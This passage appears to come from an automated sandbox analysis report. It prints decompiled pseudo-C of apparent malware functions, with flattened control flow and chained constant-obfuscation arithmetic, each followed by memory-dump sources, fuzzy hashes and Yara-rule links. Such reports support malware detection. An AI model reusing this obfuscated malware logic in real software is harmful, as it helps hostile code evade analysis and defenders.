								E00227998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
								_t383 = _t383 + 0xc;
								_t381 = 0x1e9793a2;
								continue;
							} else {
								if(_t381 == 0x108b8bb2) {
									 *_t340 =  *_t340 & 0x00000000;
									_t381 = 0x23e4e38d;
									_t340[1] = _t340[1] & 0x00000000;
									continue;
								} else {
									if(_t381 == 0x15969886) {
										_t354 =  &_v196;
										E0023360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
										_t383 = _t383 + 0xc;
										_t381 = 0x15fd630a;
										continue;
									} else {
										if(_t381 == 0x15fd630a) {
											_t354 =  &_v196;
											E0023360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
											_t383 = _t383 + 0xc;
											_t381 = 0x2ea6dd43;
											continue;
										} else {
											if(_t381 == 0x18d3ef4a) {
												_push(_t354);
												_t335 = E00228736(_t340[1]);
												 *_t340 = _t335;
												_t354 = _t354;
												__eflags = _t335;
												if(__eflags != 0) {
													_t381 = 0x22e1be53;
													continue;
												}
											} else {
												if(_t381 != 0x1a35bcc9) {
													goto L28;
												} else {
													_t354 =  &_v196;
													E0023360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
													_t383 = _t383 + 0xc;
													_t381 = 0xaa31e0c;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L23:
						__eflags =  *_t340;
						_t282 =  *_t340 != 0;
						__eflags = _t282;
						return 0 | _t282;
					}
					__eflags = _t381 - 0x22e1be53;
					if(_t381 == 0x22e1be53) {
						E002350F2( &_v196, _v76, _v68, _v112, _t340);
						_t383 = _t383 + 0xc;
						_t381 = 0x2d15c716;
						goto L28;
					} else {
						__eflags = _t381 - 0x23e4e38d;
						if(_t381 == 0x23e4e38d) {
							_t340[1] = E00237F1F(_t380);
							_t381 = 0x18d3ef4a;
							goto L1;
						} else {
							__eflags = _t381 - 0x2d15c716;
							if(__eflags == 0) {
								E00227998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
								_t383 = _t383 + 0xc;
								_t381 = 0x15969886;
								goto L1;
							} else {
								__eflags = _t381 - 0x2ea6dd43;
								if(_t381 == 0x2ea6dd43) {
									E0023360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
									_t383 = _t383 + 0xc;
									_t381 = 0x1a35bcc9;
									goto L1;
								} else {
									__eflags = _t381 - 0x39ecd3df;
									if(_t381 != 0x39ecd3df) {
										goto L28;
									} else {
										E0023360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
									}
								}
							}
						}
					}
					goto L23;
					L28:
					__eflags = _t381 - 0x1d48367e;
				} while (__eflags != 0);
				goto L23;
			}

















































                                              0x00229a43
                                              0x00229a46
                                              0x00229a48
                                              0x00229a4a
                                              0x00229a4d
                                              0x00229a4e
                                              0x00229a4f
                                              0x00229a54
                                              0x00229a5b
                                              0x00229a5e
                                              0x00229a64
                                              0x00229a68
                                              0x00229a6d
                                              0x00229a70
                                              0x00229a77
                                              0x00229a7e
                                              0x00229a85
                                              0x00229a8c
                                              0x00229a93
                                              0x00229a97
                                              0x00229aa4
                                              0x00229aa7
                                              0x00229aaa
                                              0x00229ab1
                                              0x00229ab8
                                              0x00229abf
                                              0x00229ac6
                                              0x00229acd
                                              0x00229ad4
                                              0x00229adf
                                              0x00229ae2
                                              0x00229ae9
                                              0x00229af0
                                              0x00229af7
                                              0x00229afe
                                              0x00229b09
                                              0x00229b0c
                                              0x00229b10
                                              0x00229b17
                                              0x00229b1e
                                              0x00229b22
                                              0x00229b29
                                              0x00229b34
                                              0x00229b37
                                              0x00229b45
                                              0x00229b48
                                              0x00229b4f
                                              0x00229b59
                                              0x00229b5c
                                              0x00229b5f
                                              0x00229b66
                                              0x00229b6d
                                              0x00229b74
                                              0x00229b7b
                                              0x00229b82
                                              0x00229b89
                                              0x00229b90
                                              0x00229b97
                                              0x00229b9e
                                              0x00229ba5
                                              0x00229bac
                                              0x00229bb3
                                              0x00229bba
                                              0x00229bc1
                                              0x00229bc8
                                              0x00229bcf
                                              0x00229bd6
                                              0x00229bdf
                                              0x00229be6
                                              0x00229bed
                                              0x00229bf4
                                              0x00229bf8
                                              0x00229bff
                                              0x00229c06
                                              0x00229c13
                                              0x00229c16
                                              0x00229c19
                                              0x00229c20
                                              0x00229c27
                                              0x00229c2e
                                              0x00229c32
                                              0x00229c39
                                              0x00229c47
                                              0x00229c4a
                                              0x00229c51
                                              0x00229c58
                                              0x00229c5f
                                              0x00229c69
                                              0x00229c6e
                                              0x00229c76
                                              0x00229c7b
                                              0x00229c80
                                              0x00229c87
                                              0x00229c8e
                                              0x00229c95
                                              0x00229c9c
                                              0x00229ca7
                                              0x00229ca8
                                              0x00229cab
                                              0x00229cb2
                                              0x00229cb9
                                              0x00229cbd
                                              0x00229cc4
                                              0x00229ccb
                                              0x00229cd2
                                              0x00229cd9
                                              0x00229ce0
                                              0x00229ce7
                                              0x00229ceb
                                              0x00229cef
                                              0x00229cf6
                                              0x00229cfd
                                              0x00229d09
                                              0x00229d0c
                                              0x00229d13
                                              0x00229d1a
                                              0x00229d25
                                              0x00229d28
                                              0x00229d2f
                                              0x00229d36
                                              0x00229d3d
                                              0x00229d41
                                              0x00229d48
                                              0x00229d4f
                                              0x00229d56
                                              0x00229d5d
                                              0x00229d64
                                              0x00229d68
                                              0x00229d6f
                                              0x00229d76
                                              0x00229d7d
                                              0x00229d84
                                              0x00229d8b
                                              0x00229d92
                                              0x00229d96
                                              0x00229d9d
                                              0x00229da8
                                              0x00229dab
                                              0x00229daf
                                              0x00229daf
                                              0x00229db6
                                              0x00229db6
                                              0x00229db6
                                              0x00229db6
                                              0x00229dbc
                                              0x00000000
                                              0x00000000
                                              0x00229dc2
                                              0x00229ee5
                                              0x00229eea
                                              0x00229eed
                                              0x00000000
                                              0x00229dc8
                                              0x00229dce
                                              0x00229ebf
                                              0x00229ec4
                                              0x00229ec7
                                              0x00000000
                                              0x00229dd4
                                              0x00229dda
                                              0x00229e9a
                                              0x00229e9d
                                              0x00229ea2
                                              0x00000000
                                              0x00229de0
                                              0x00229de6
                                              0x00229e79
                                              0x00229e88
                                              0x00229e8d
                                              0x00229e90
                                              0x00000000
                                              0x00229dec
                                              0x00229df2
                                              0x00229e55
                                              0x00229e64
                                              0x00229e69
                                              0x00229e6c
                                              0x00000000
                                              0x00229df4
                                              0x00229dfa
                                              0x00229e32
                                              0x00229e37
                                              0x00229e3c
                                              0x00229e3f
                                              0x00229e40
                                              0x00229e42
                                              0x00229e48
                                              0x00000000
                                              0x00229e48
                                              0x00229dfc
                                              0x00229e02
                                              0x00000000
                                              0x00229e08
                                              0x00229e0b
                                              0x00229e1a
                                              0x00229e1f
                                              0x00229e22
                                              0x00000000
                                              0x00229e22
                                              0x00229e02
                                              0x00229dfa
                                              0x00229df2
                                              0x00229de6
                                              0x00229dda
                                              0x00229dce
                                              0x00229f45
                                              0x00229f47
                                              0x00229f4b
                                              0x00229f4b
                                              0x00229f52
                                              0x00229f52
                                              0x00229ef7
                                              0x00229efd
                                              0x00229fbe
                                              0x00229fc3
                                              0x00229fc6
                                              0x00000000
                                              0x00229f03
                                              0x00229f03
                                              0x00229f09
                                              0x00229fa1
                                              0x00229fa4
                                              0x00000000
                                              0x00229f0f
                                              0x00229f0f
                                              0x00229f15
                                              0x00229f88
                                              0x00229f8d
                                              0x00229f90
                                              0x00000000
                                              0x00229f17
                                              0x00229f17
                                              0x00229f1d
                                              0x00229f65
                                              0x00229f6a
                                              0x00229f6d
                                              0x00000000
                                              0x00229f1f
                                              0x00229f1f
                                              0x00229f25
                                              0x00000000
                                              0x00229f2b
                                              0x00229f3d
                                              0x00229f42
                                              0x00229f25
                                              0x00229f1d
                                              0x00229f15
                                              0x00229f09
                                              0x00000000
                                              0x00229fcb
                                              0x00229fcb
                                              0x00229fcb
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 'Vj
                                              • API String ID: 0-2210790371
                                              • Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                              • Instruction ID: 010f0064708bb1f73297e75d8b886110e02e9317f9a6f021fac2715c737eccc9
                                              • Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                              • Instruction Fuzzy Hash: 4EF142B2C10329EBDF18CFE5D98A9DEBBB1FB04314F248159D415BA2A0D7B41A95CF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00231BDF, Relevance: 1.5, Strings: 1, Instructions: 283COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00231BDF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t303;
				void* _t311;
				void* _t314;
				void* _t315;
				intOrPtr _t347;
				void* _t348;
				short* _t349;
				void* _t350;
				short* _t351;
				short* _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				void* _t365;

				_t347 =  *0x23ca2c; // 0x4d8300
				_v48 = 0xd714;
				_t348 = _t347 + 0x230;
				_v48 = _v48 ^ 0xcd668ab2;
				_t315 = 0x3a31b660;
				_v48 = _v48 | 0x2f181106;
				_v48 = _v48 ^ 0xef7e1823;
				_v84 = 0x5d44;
				_t353 = 0x2d;
				_v84 = _v84 / _t353;
				_v84 = _v84 ^ 0x00001499;
				_v28 = 0xf70b;
				_t354 = 0xd;
				_v28 = _v28 / _t354;
				_v28 = _v28 | 0x6a0646bd;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x35037bad;
				_v24 = 0xed7c;
				_v24 = _v24 + 0xffff8d1e;
				_v24 = _v24 + 0xffff0c72;
				_t355 = 0x48;
				_v24 = _v24 / _t355;
				_v24 = _v24 ^ 0x038e22ac;
				_v64 = 0x5fc5;
				_v64 = _v64 >> 4;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x000058c3;
				_v92 = 0x2688;
				_v92 = _v92 | 0xea27999c;
				_v92 = _v92 ^ 0xea278961;
				_v96 = 0x4a14;
				_t356 = 0x1f;
				_v96 = _v96 / _t356;
				_v96 = _v96 ^ 0x0000119a;
				_v36 = 0xd568;
				_v36 = _v36 ^ 0xbcd770ac;
				_v36 = _v36 << 6;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xe97134d4;
				_v68 = 0xedd2;
				_t357 = 0x63;
				_v68 = _v68 * 0x5e;
				_v68 = _v68 + 0xde9c;
				_v68 = _v68 ^ 0x00587d35;
				_v32 = 0x24d4;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2e569407;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x9e03fcb0;
				_v104 = 0x1c4d;
				_v104 = _v104 + 0xfffffff9;
				_v104 = _v104 ^ 0x00005633;
				_v40 = 0xb450;
				_v40 = _v40 + 0x94db;
				_v40 = _v40 | 0x3dcacfe3;
				_v40 = _v40 / _t357;
				_v40 = _v40 ^ 0x009f9709;
				_v100 = 0x6d07;
				_t358 = 0x45;
				_v100 = _v100 * 0x69;
				_v100 = _v100 ^ 0x002cf62e;
				_v72 = 0x5e87;
				_v72 = _v72 / _t358;
				_v72 = _v72 + 0xffff9f14;
				_v72 = _v72 ^ 0xffffe852;
				_v56 = 0x964f;
				_v56 = _v56 << 0xd;
				_v56 = _v56 + 0x58a7;
				_v56 = _v56 ^ 0x12ca7579;
				_v8 = 0x11e7;
				_t359 = 0x26;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 7;
				_v8 = _v8 / _t359;
				_v8 = _v8 ^ 0x001dbdc0;
				_v52 = 0x5afe;
				_t360 = 0x23;
				_v52 = _v52 * 0x24;
				_v52 = _v52 / _t360;
				_v52 = _v52 ^ 0x00001a55;
				_v88 = 0xb83d;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x00006413;
				_v20 = 0x5af3;
				_t361 = 0x3a;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 + 0x6d49;
				_v20 = _v20 ^ 0x8eb5ed48;
				_v20 = _v20 ^ 0x8e93dded;
				_v16 = 0x70c;
				_v16 = _v16 / _t361;
				_v16 = _v16 + 0xffff5089;
				_v16 = _v16 | 0x770f0b4d;
				_v16 = _v16 ^ 0xffff12de;
				_v60 = 0xa79c;
				_v60 = _v60 | 0xbac1c5ec;
				_v60 = _v60 + 0x6b12;
				_v60 = _v60 ^ 0xbac228f9;
				_v12 = 0x5546;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x001372eb;
				_v80 = 0x25db;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 3;
				_v80 = _v80 ^ 0x25db4552;
				_v44 = 0xe1b0;
				_v44 = _v44 + 0xffff2f0e;
				_v44 = _v44 | 0x46f5308b;
				_v44 = _v44 * 0x56;
				_v44 = _v44 ^ 0xd65e5bab;
				_v108 = 0x5856;
				_v108 = _v108 ^ 0x78cd5bef;
				_v108 = _v108 ^ 0x78cd26cd;
				_v76 = 0xfba5;
				_v76 = _v76 + 0xffff77ce;
				_t362 = 0x11;
				_v76 = _v76 / _t362;
				_v76 = _v76 ^ 0x00005641;
				_t314 = 2;
				do {
					while(_t315 != 0x1de3f48) {
						if(_t315 == 0x1f19b69e) {
							_t363 = E002278A5(_t315, _t315, 0x10, _t315, 4);
							E00227787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
							_t350 = _t348 + _t314;
							E00227787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
							_t365 = _t365 + 0x40;
							_t351 = _t350 + _t363 * 2;
							_t315 = 0x344e60d4;
							_t303 = 0x5c;
							 *_t351 = _t303;
							_t348 = _t351 + _t314;
							continue;
						} else {
							if(_t315 == 0x344e60d4) {
								_t364 = E002278A5(_t315, _t315, 0x10, _t315, 4);
								E00227787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
								_t365 = _t365 + 0x28;
								_t352 = _t348 + _t364 * 2;
								_t315 = 0x1de3f48;
								_t311 = 0x2e;
								 *_t352 = _t311;
								_t348 = _t352 + _t314;
								continue;
							} else {
								if(_t315 == 0x3a31b660) {
									_t311 = E00238C8F(_t315);
									_v112 = _t311;
									_t315 = 0x1f19b69e;
									continue;
								}
							}
						}
						goto L9;
					}
					E00227787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
					_t349 = _t348 + 6;
					_t365 = _t365 + 0x18;
					_t315 = 0x2228f3b5;
					 *_t349 = 0;
					_t348 = _t349 + _t314;
					L9:
				} while (_t315 != 0x2228f3b5);
				return _t311;
			}





















































                                              0x00231be8
                                              0x00231bf0
                                              0x00231bf7
                                              0x00231bfd
                                              0x00231c04
                                              0x00231c09
                                              0x00231c10
                                              0x00231c17
                                              0x00231c23
                                              0x00231c28
                                              0x00231c2d
                                              0x00231c34
                                              0x00231c3e
                                              0x00231c43
                                              0x00231c48
                                              0x00231c4f
                                              0x00231c52
                                              0x00231c59
                                              0x00231c60
                                              0x00231c67
                                              0x00231c71
                                              0x00231c76
                                              0x00231c7b
                                              0x00231c82
                                              0x00231c89
                                              0x00231c8d
                                              0x00231c90
                                              0x00231c97
                                              0x00231c9e
                                              0x00231ca5
                                              0x00231cac
                                              0x00231cb6
                                              0x00231cbb
                                              0x00231cc0
                                              0x00231cc7
                                              0x00231cce
                                              0x00231cd5
                                              0x00231cd9
                                              0x00231cdd
                                              0x00231ce4
                                              0x00231cef
                                              0x00231cf0
                                              0x00231cf3
                                              0x00231cfa
                                              0x00231d01
                                              0x00231d08
                                              0x00231d0c
                                              0x00231d13
                                              0x00231d17
                                              0x00231d1e
                                              0x00231d25
                                              0x00231d29
                                              0x00231d30
                                              0x00231d37
                                              0x00231d3e
                                              0x00231d4a
                                              0x00231d4d
                                              0x00231d54
                                              0x00231d63
                                              0x00231d66
                                              0x00231d69
                                              0x00231d70
                                              0x00231d7e
                                              0x00231d81
                                              0x00231d88
                                              0x00231d8f
                                              0x00231d96
                                              0x00231d9a
                                              0x00231da1
                                              0x00231da8
                                              0x00231db3
                                              0x00231db6
                                              0x00231db9
                                              0x00231dc4
                                              0x00231dc7
                                              0x00231dce
                                              0x00231dd9
                                              0x00231ddc
                                              0x00231de6
                                              0x00231de9
                                              0x00231df0
                                              0x00231df7
                                              0x00231dfb
                                              0x00231e02
                                              0x00231e0d
                                              0x00231e0e
                                              0x00231e11
                                              0x00231e18
                                              0x00231e1f
                                              0x00231e26
                                              0x00231e32
                                              0x00231e35
                                              0x00231e3c
                                              0x00231e43
                                              0x00231e4a
                                              0x00231e51
                                              0x00231e58
                                              0x00231e5f
                                              0x00231e66
                                              0x00231e6d
                                              0x00231e71
                                              0x00231e79
                                              0x00231e7c
                                              0x00231e83
                                              0x00231e8a
                                              0x00231e8e
                                              0x00231e92
                                              0x00231e99
                                              0x00231ea0
                                              0x00231ea7
                                              0x00231eb2
                                              0x00231eb5
                                              0x00231ebc
                                              0x00231ec3
                                              0x00231eca
                                              0x00231ed1
                                              0x00231ed8
                                              0x00231ee6
                                              0x00231eeb
                                              0x00231eee
                                              0x00231ef5
                                              0x00231ef6
                                              0x00231ef6
                                              0x00231f08
                                              0x00231f99
                                              0x00231fac
                                              0x00231fb1
                                              0x00231fc8
                                              0x00231fcd
                                              0x00231fd0
                                              0x00231fd3
                                              0x00231fda
                                              0x00231fdb
                                              0x00231fde
                                              0x00000000
                                              0x00231f0a
                                              0x00231f10
                                              0x00231f4e
                                              0x00231f61
                                              0x00231f66
                                              0x00231f69
                                              0x00231f6c
                                              0x00231f73
                                              0x00231f74
                                              0x00231f77
                                              0x00000000
                                              0x00231f12
                                              0x00231f18
                                              0x00231f24
                                              0x00231f29
                                              0x00231f2c
                                              0x00000000
                                              0x00231f2c
                                              0x00231f18
                                              0x00231f10
                                              0x00000000
                                              0x00231f08
                                              0x00231ffb
                                              0x00232000
                                              0x00232005
                                              0x00232008
                                              0x0023200d
                                              0x00232010
                                              0x00232012
                                              0x00232012
                                              0x00232024

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 5}X
                                              • API String ID: 0-583016468
                                              • Opcode ID: ec4c3dcec50a5910c37c25ce316154261ec553cc523febe50d32d280e7c8df78
                                              • Instruction ID: 0af3a5236d8b7cf2e6bb0496a8f94611baee9a08d5d11c1ef11e3cc3eed87243
                                              • Opcode Fuzzy Hash: ec4c3dcec50a5910c37c25ce316154261ec553cc523febe50d32d280e7c8df78
                                              • Instruction Fuzzy Hash: 51D12271D10319EBDB18CFE5D88A9DEBBB1FF44314F208019E112BA2A0D7B91A56CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002262A3, Relevance: 1.4, Strings: 1, Instructions: 178COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 89%
                                              			E002262A3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				char _v1128;
				void* _t179;
				void* _t180;
				intOrPtr _t182;
				void* _t190;
				intOrPtr _t206;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;

				_v88 = 0xf2dad;
				_t209 = 0;
				_t190 = 0x374ac1da;
				_v84 = _v84 & 0;
				_v40 = 0xb12b;
				_v40 = _v40 << 0xe;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000058bc;
				_v60 = 0xf727;
				_t210 = 0x4f;
				_v60 = _v60 / _t210;
				_v60 = _v60 ^ 0x00007065;
				_v8 = 0x9eec;
				_v8 = _v8 + 0xd770;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x00000fb6;
				_v44 = 0x7887;
				_v44 = _v44 << 5;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x00001109;
				_v16 = 0xef0c;
				_t211 = 0x7a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0xca26cbdc;
				_v16 = _v16 | 0x7bdc5f23;
				_v16 = _v16 ^ 0xfbfc55fd;
				_v76 = 0xd8b4;
				_v76 = _v76 + 0x9c32;
				_v76 = _v76 ^ 0x00017966;
				_v36 = 0x1b76;
				_v36 = _v36 + 0x8638;
				_v36 = _v36 | 0x465c0394;
				_v36 = _v36 ^ 0x465cdef1;
				_v28 = 0xf8c7;
				_v28 = _v28 ^ 0x90f840f6;
				_v28 = _v28 / _t211;
				_v28 = _v28 ^ 0x01300a73;
				_v80 = 0x4878;
				_v80 = _v80 ^ 0xf33f81bb;
				_v80 = _v80 ^ 0xf33fed7c;
				_v12 = 0x5e32;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0xb939d170;
				_v12 = _v12 + 0xffffe46d;
				_v12 = _v12 ^ 0xb939c5f3;
				_v72 = 0xdcc7;
				_t212 = 5;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00000998;
				_v52 = 0xf409;
				_v52 = _v52 >> 7;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x00002b61;
				_v20 = 0x5cd8;
				_v20 = _v20 + 0x5908;
				_v20 = _v20 * 0x1c;
				_v20 = _v20 * 0x14;
				_v20 = _v20 ^ 0x018d9ab8;
				_v32 = 0x162d;
				_v32 = _v32 + 0xffff1b5c;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x1fff9926;
				_v64 = 0x95af;
				_v64 = _v64 + 0xffff7063;
				_v64 = _v64 ^ 0x00004670;
				_v56 = 0xeead;
				_v56 = _v56 + 0xffffd284;
				_v56 = _v56 ^ 0x94a6c65a;
				_v56 = _v56 ^ 0x94a662be;
				_v68 = 0xa18;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x0000400d;
				_v48 = 0xd4d3;
				_v48 = _v48 * 3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0013dfa3;
				_v24 = 0x2d4a;
				_v24 = _v24 << 9;
				_v24 = _v24 + 0x17ff;
				_v24 = _v24 ^ 0x005aa30d;
				do {
					while(_t190 != 0x17ec002) {
						if(_t190 == 0x20702549) {
							_push(_v36);
							_t180 = E0023889D(0x23c930, _v76, __eflags);
							_t182 =  *0x23ca2c; // 0x4d8300
							_t206 =  *0x23ca2c; // 0x4d8300
							E002229E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
							E00232025(_v20, _t180, _v32, _v64);
							_t214 = _t214 + 0x30;
							_t190 = 0x17ec002;
							continue;
						} else {
							if(_t190 == 0x374ac1da) {
								_push(_t190);
								_push(_t190);
								E0022C6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
								_t214 = _t214 + 0x1c;
								_t190 = 0x20702549;
								continue;
							}
						}
						goto L7;
					}
					_push(_t190);
					_push(_v24);
					_push(0);
					_push(_v48);
					_push(0);
					_push(_v68);
					_push( &_v1128);
					_t179 = E0022568E(_v56, 0);
					_t214 = _t214 + 0x1c;
					__eflags = _t179;
					_t209 =  !=  ? 1 : _t209;
					_t190 = 0x3985ca2d;
					L7:
					__eflags = _t190 - 0x3985ca2d;
				} while (__eflags != 0);
				return _t209;
			}




































                                              0x002262ac
                                              0x002262b8
                                              0x002262ba
                                              0x002262bf
                                              0x002262c2
                                              0x002262c9
                                              0x002262cd
                                              0x002262d1
                                              0x002262d8
                                              0x002262e4
                                              0x002262e9
                                              0x002262ee
                                              0x002262f5
                                              0x002262fc
                                              0x00226303
                                              0x00226307
                                              0x0022630b
                                              0x00226312
                                              0x00226319
                                              0x0022631d
                                              0x00226321
                                              0x00226328
                                              0x00226333
                                              0x00226336
                                              0x00226339
                                              0x00226340
                                              0x00226347
                                              0x0022634e
                                              0x00226355
                                              0x0022635c
                                              0x00226363
                                              0x0022636a
                                              0x00226371
                                              0x00226378
                                              0x0022637f
                                              0x00226386
                                              0x00226394
                                              0x00226397
                                              0x0022639e
                                              0x002263a5
                                              0x002263ac
                                              0x002263b3
                                              0x002263ba
                                              0x002263be
                                              0x002263c5
                                              0x002263cc
                                              0x002263d3
                                              0x002263dd
                                              0x002263e0
                                              0x002263e3
                                              0x002263ea
                                              0x002263f1
                                              0x002263f5
                                              0x002263f9
                                              0x00226400
                                              0x00226407
                                              0x00226412
                                              0x00226419
                                              0x0022641c
                                              0x00226423
                                              0x0022642a
                                              0x00226431
                                              0x00226435
                                              0x0022643c
                                              0x00226448
                                              0x0022644f
                                              0x00226456
                                              0x0022645d
                                              0x00226464
                                              0x0022646b
                                              0x00226472
                                              0x00226479
                                              0x0022647d
                                              0x00226484
                                              0x0022648f
                                              0x00226492
                                              0x00226496
                                              0x0022649d
                                              0x002264a4
                                              0x002264a8
                                              0x002264af
                                              0x002264b6
                                              0x002264b6
                                              0x002264c4
                                              0x002264f7
                                              0x00226502
                                              0x0022651c
                                              0x00226530
                                              0x0022653c
                                              0x0022654c
                                              0x00226551
                                              0x00226554
                                              0x00000000
                                              0x002264c6
                                              0x002264cc
                                              0x002264d2
                                              0x002264d3
                                              0x002264eb
                                              0x002264f0
                                              0x002264f3
                                              0x00000000
                                              0x002264f3
                                              0x002264cc
                                              0x00000000
                                              0x002264c4
                                              0x0022655e
                                              0x0022655f
                                              0x0022656a
                                              0x0022656c
                                              0x0022656f
                                              0x00226571
                                              0x00226577
                                              0x00226578
                                              0x0022657f
                                              0x00226583
                                              0x00226585
                                              0x00226588
                                              0x0022658d
                                              0x0022658d
                                              0x0022658d
                                              0x002265a1

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: I%p
                                              • API String ID: 0-3985577374
                                              • Opcode ID: b3f53a6467149419537f6f09bc4c34a53d2fb146d4657ed45ddf9a3933351b18
                                              • Instruction ID: 4343c094ae1d0674115463143560623cdfb1626950a94fba81751970624082ff
                                              • Opcode Fuzzy Hash: b3f53a6467149419537f6f09bc4c34a53d2fb146d4657ed45ddf9a3933351b18
                                              • Instruction Fuzzy Hash: 188127B2D1021DABDF18CFE5D94A9DEBBB1FF44318F208159E111B62A0D7B90A49CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00230D33, Relevance: 1.4, Strings: 1, Instructions: 122COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00230D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t128;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t173;
				signed int _t174;

				_push(_a12);
				_t173 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t128);
				_v8 = 0x6813;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xf4e07894;
				_v8 = _v8 | 0x641e1778;
				_v8 = _v8 ^ 0xf4fe1535;
				_v16 = 0x7d9d;
				_t155 = 0x16;
				_v16 = _v16 * 0x4d;
				_v16 = _v16 ^ 0x0025b62f;
				_v32 = 0xbd8b;
				_v32 = _v32 ^ 0xdfb27dce;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x0a2b09ce;
				_v28 = 0xad22;
				_t156 = 0x34;
				_v28 = _v28 * 0x47;
				_v28 = _v28 + 0x4161;
				_v28 = _v28 ^ 0x00307d44;
				_v36 = 0xa165;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x00006be3;
				_v12 = 0xca43;
				_v12 = _v12 << 7;
				_v12 = _v12 + 0x4480;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00004998;
				_v44 = 0xc326;
				_v44 = _v44 / _t156;
